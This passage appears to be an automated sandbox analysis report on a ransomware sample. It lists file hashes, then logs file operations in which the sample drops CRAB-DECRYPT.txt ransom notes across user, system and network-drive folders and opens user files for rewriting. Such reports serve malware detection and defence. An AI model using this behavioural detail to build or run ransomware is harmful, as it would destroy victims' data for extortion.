c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\word document building blocks\1033\tm02835270[[fn=photo sidebar (annual report red and black design)]].docx 226.34 KB MD5: d53cd613cffabd7504960f313af39bfd
SHA1: cf82d8f7ed6e7d1f179a0372a8715ce2ea0781ab
SHA256: 37a0d1fd5249d3b46754cc02db73add8ef6633935f289c6f0d072c55e3ae31c6
False
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\word document building blocks\1033\tm02835271[[fn=sample table (annual report red and black design)]].docx 29.44 KB MD5: 25e86197f269606061e99c525b826b9d
SHA1: fb1fb02b7866d5d58e7863e39ac1fe52af7b4c1c
SHA256: 08e70e5b5086a7850624dd67a23db8546e9a014e3b84194cc143d9c6d4e75960
False
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\word document building blocks\1033\tm02835272[[fn=sample table (annual report timeless design)]].docx 44.88 KB MD5: 61388293531b46cd5f842f527b2f9c4f
SHA1: 7e6c8d8ee04c8bd786a38e503a833b087cb480ae
SHA256: fba55f3ce489ff3e3cfd43287a9c69c11d80c8480f0075dda9a0e517670455b0
False
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\word document building blocks\1033\tm02836362[[fn=cover letter (resume timeless design)]].docx 50.31 KB MD5: 22854804b436b218cc99ab26875eb0a0
SHA1: 1b127643d3a961e45bdd3e0d27e7fa12462d8fbc
SHA256: 7bd6a51d444bdd7104c5ca3f528e03cc79e4c6c15d65c8158d7cef38669fe969
False
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\word document building blocks\1033\tm03998158[[fn=element]].dotx 34.12 KB MD5: 612b1dc58dbcfbfd17bfad854fb703f5
SHA1: 724806bfdeba99459533cb105f7444d23bd86283
SHA256: 950496b0baa7be92a9ebc70acf6e40b02ffe0ae7db72b674741fd97002dce3f0
False
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\word document building blocks\1033\tm03998159[[fn=insight]].dotx 2.10 MB MD5: be5b4996fd89147059141be0f4f7aaad
SHA1: d6d318d3d3b7585dda2417a77dc05928573c500d
SHA256: e03a9bb3500e1ebb9a09e27b3eb88784bf500357200bf38245364db6f267a7c0
False
Host Behavior
File (1908)
Operation Filename Additional Information Success Count Logfile
Create C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\$Recycle.Bin\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\$Recycle.Bin\S-1-5-18\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\$Recycle.Bin\S-1-5-21-2172869166-1497266965-2109836178-1000\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\$Recycle.Bin\S-1-5-21-2172869166-1497266965-2109836178-1000\$IPEWI8I.TMP desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Documents and Settings\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\MSOCache\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\PerfLogs\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Recovery\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\System Volume Information\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create Z:\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create Z:\ggNuzUYFd.swf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Default\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\AppData\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\AppData\Local\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\AppData\Local\Application Data\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\AppData\Local\History\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\InputPersonalization\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\InputPersonalization\TrainedDataStore\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Sidebar\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Sidebar\Gadgets\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Sidebar\settings.ini desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Default\AppData\Local\Temp\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\AppData\Local\Temporary Internet Files\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create Z:\QbYwYSoMD3beKw.mkv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Default\AppData\Roaming\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\AppData\Roaming\Microsoft\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\Application Data\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\Cookies\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\Desktop\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\Documents\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\Documents\My Music\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\Documents\My Pictures\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\Documents\My Videos\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\Downloads\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\Favorites\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\Links\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\Music\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\My Documents\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\NetHood\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\NTUSER.DAT.LOG1 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Default\NTUSER.DAT.LOG2 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Default\NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TM.blf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Default\NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TMContainer00000000000000000001.regtrans-ms desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Default\NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TMContainer00000000000000000002.regtrans-ms desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Default\Pictures\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\PrintHood\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\Recent\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\Saved Games\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\SendTo\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\Start Menu\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\Templates\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\Videos\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default User\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\27YjI_tg_wmDvK-.gif desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\2KxNzGrrl.doc desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create Z:\fUHonlL.swf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\57VfXi.wav desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\7y338WW30Khw_Kvdj.bmp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\80nauBl1bcqQ.mp3 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\9HQb6.gif desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\aD456ynae.png desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\DC\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\DC\Collab\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\DC\Forms\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create Z:\brgVKnP3IVGPPX.pps desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\DC\JSCache\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\DC\Security\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\DC\Security\addressbook.acrodata desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Flash Player\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Flash Player\AssetCache\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Flash Player\AssetCache\EYGUEQKQ\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Flash Player\NativeCache\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Headlights\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Linguistics\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\LogTransport2\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\LogTransport2\Logs\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\LogTransport2\Logs\ulog_Acrobat12_Reader_3980e2e3-09b5-4737-a657-22675b06a39a_03db394c-1477-45d1-895c-00e42db7e723_0.rdy desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create Z:\PCEJlbmpwZ68QNsWdvWo.mp4 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\LogTransport2\LogTransport2.cfg desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Sonar\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Sonar\Sonar1.0\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Sonar\Sonar1.0\sonar_policy.xml desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create Z:\zP0nKisr4oLuznV8Y.pptx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\BC4CK.mp3 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Cx 2hVTJNEPKc.mp3 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\d 3OIHehyy3Jgx.mp4 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Dz28gHwyj9-jVurMnBQV.ots desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\fezrNJYET8dXBnLxa.mp4 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\FKoQ.odt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\gfLne6ecA1jmfG6m8.mkv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Im-Xi-TXJUjXU8gwjeAN.avi desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create Z:\DR2HdhXM7A.xls desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\iVmnctwjmS.swf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\je8O8Wzi8buOk7-5Nx6.m4a desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\KdoskM.avi desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Macromedia\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Macromedia\Flash Player\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\P7UB2489\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Macromedia\Flash Player\macromedia.com\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\settings.sol desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create Z:\0uoW8iDiO9C0q.jpg desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\AddIns\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\APASixthEditionOfficeOnline.xsl desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\CHICAGO.XSL desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\GB.XSL desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create Z:\ctwtFUQdhyq9B0.flv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\GostName.XSL desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\GostTitle.XSL desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\HarvardAnglia2008OfficeOnline.xsl desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\IEEE2006OfficeOnline.xsl desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create Z:\wwWTiMqjx6hY7AqmcQRC.rtf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\ISO690.XSL desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\ISO690Nmerical.XSL desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
